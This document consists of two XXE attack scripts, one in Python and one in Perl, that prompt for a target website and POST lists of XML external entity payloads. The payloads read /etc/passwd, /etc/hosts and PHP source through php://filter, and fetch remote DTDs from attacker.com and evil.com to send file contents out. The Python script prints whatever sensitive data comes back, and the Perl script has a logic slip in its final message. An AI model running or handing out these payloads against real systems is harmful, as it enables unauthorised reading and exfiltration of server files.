File: hacking_with_python/xxe.py
import requests
import sys

# Function to test XXE vulnerability with multiple payloads
def test_xxe_vulnerability(url):
    try:
        print("\033[94m[*] Sending test payloads to detect XXE vulnerability...\033[0m")
        
        # Define multiple XML payloads with different external entities
        payloads = [
            '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
            '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/hosts">]><foo>&xxe;</foo>',
            '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "http://attacker.com/xxe.txt">]><foo>&xxe;</foo>',
            '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "file:///etc/passwd"><!ENTITY ret SYSTEM "php://filter/convert.base64-encode/resource=index.php"><!ENTITY data "<!ENTITY exfil SYSTEM \'http://attacker.com/?%xxe;%ret;\'>"> %data; %exfil; %data;]>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">%remote;%int;%send;]>',
            '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % d SYSTEM "http://attacker.com/evil.dtd">%d;]>',
            '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">%remote;%int;%send;]>',
            '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY % data SYSTEM "http://attacker.com/evil.dtd">%data;%send;]>',
            '<?xml version="1.0"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><test>&xxe;</test>'
        ]
        
        # Iterate over each payload and send a POST request
        for index, payload in enumerate(payloads, start=1):
            print("\033[94m[*] Sending Payload", index, "...\033[0m")
            response = requests.post(url, data=payload)
            print("\033[94m[*] Request sent to:", response.url, "\033[0m")
            
            # Check if the response contains any sensitive information
            if 'root:' in response.text:
                print("\033[91m[!] The target website is vulnerable to XXE!\033[0m")
                print("\033[91m[!] Sensitive information retrieved for Payload", index, ":\n", response.text, "\033[0m")
            else:
                print("\033[92m[*] Payload", index, "did not reveal any sensitive information.\033[0m")
        
        # Show how to test the vulnerability further
        print("\n\033[94m[>] To test the vulnerability further, try modifying the XML payload to access other sensitive files or external entities.\033[0m")
        
    except Exception as e:
        print("\033[91m[!] An error occurred while testing for XXE vulnerability:", e, "\033[0m")

# Main function
def main():
    try:
        # Ask for the target website URL
        target_url = input("\033[95mEnter your target website URL: \033[0m")
        
        print("\033[94m[*] Testing for XXE vulnerability in:", target_url, "\033[0m")
        
        # Test for XXE vulnerability
        test_xxe_vulnerability(target_url)
        
    except KeyboardInterrupt:
        print("\n\033[91m[!] Keyboard Interrupt detected. Exiting...\033[0m")
        sys.exit(0)

if __name__ == "__main__":
    main()

File: hacking_with_perl/xxe.pl
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use Term::ANSIColor;

# Prompt for the target website URL
print color('bold blue'), "Enter your target website URL: ", color('reset');
my $url = <STDIN>;
chomp($url);

# List of payloads
my @payloads = (
    "<?xml version='1.0'?><!DOCTYPE test [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><test>&xxe;</test>",
    "<?xml version='1.0'?><!DOCTYPE test [<!ENTITY xxe SYSTEM 'http://evil.com/xxe'>]><test>&xxe;</test>",
    "<?xml version='1.0'?><!DOCTYPE test [<!ENTITY % remote SYSTEM 'http://evil.com/xxe'> %remote;]><test>&xxe;</test>",
    "<?xml version='1.0'?><!DOCTYPE test [<!ENTITY % remote SYSTEM 'http://evil.com/xxe'> %remote;]><test>&remote;</test>",
    "<?xml version='1.0'?><!DOCTYPE test [<!ENTITY % file SYSTEM 'file:///etc/passwd'><test>&file;</test>]",
    "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM 'http://evil.com/xxe'> %xxe;]><foo>&xxe;</foo>",
    "<?xml version='1.0'?><!DOCTYPE test [<!ENTITY % dtd SYSTEM 'http://example.com/xxe.dtd'> %dtd;]><test>&all;</test>",
    "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE foo [<!ENTITY % data SYSTEM 'file:///etc/passwd'> %data;]><foo>&data;</foo>"
);

# Create a new UserAgent object
my $ua = LWP::UserAgent->new;

# Iterate over payloads and test for XXE vulnerability
foreach my $payload (@payloads) {
    # Create an HTTP request object with the payload
    my $request = HTTP::Request->new(POST => $url);
    $request->header('Content-Type' => 'text/xml');
    $request->content($payload);

    # Print the HTTP request details
    print color('bold blue'), "\n[+] Sending HTTP request with payload to $url:\n", color('reset');
    print $request->as_string;

    # Send the HTTP request and capture the response
    print color('bold blue'), "\n[+] Waiting for response from the server...\n", color('reset');
    my $response = $ua->request($request);

    # Print the HTTP response details
    print color('bold blue'), "\n[+] Received HTTP response:\n", color('reset');
    print $response->as_string;

    # Check if the response contains any sensitive information
    if ($response->content =~ /root:/) {
        print color('bold red'), "\n[!] XXE vulnerability detected with payload:\n$payload\n", color('reset');
        last; # Stop testing if vulnerability detected
    }
}

# If no vulnerability detected after trying all payloads
print color('bold green'), "\n[+] No XXE vulnerability detected on the target website.\n", color('reset');
